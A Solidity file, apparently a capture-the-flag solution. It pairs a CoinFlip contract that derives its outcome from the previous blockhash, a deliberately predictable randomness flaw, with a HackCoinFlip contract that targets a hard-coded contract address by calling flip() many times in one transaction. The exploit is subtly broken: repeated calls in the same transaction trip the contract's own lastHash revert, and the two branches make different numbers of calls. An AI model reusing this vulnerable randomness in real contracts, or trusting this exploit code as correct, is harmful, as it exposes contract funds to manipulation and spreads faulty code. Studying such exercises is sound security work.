// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CoinFlip {
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() {
        consecutiveWins = 0;
    }

    function flip(bool _guess) public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        if (side == _guess) {
            consecutiveWins++;
            return true;
        } else {
            consecutiveWins = 0;
            return false;
        }
    }
}

contract HackCoinFlip{
    address _instance = 0xE308ba5DC4733D9A2971F0f1Fd23CEc606d0E87B;

    constructor() {
    }

    function hack() public {
        CoinFlip coinFlip = CoinFlip(_instance);
        
        if (coinFlip.flip(true)) {
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
            coinFlip.flip(true);
        } else { 
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
            coinFlip.flip(false);
        }
    }
}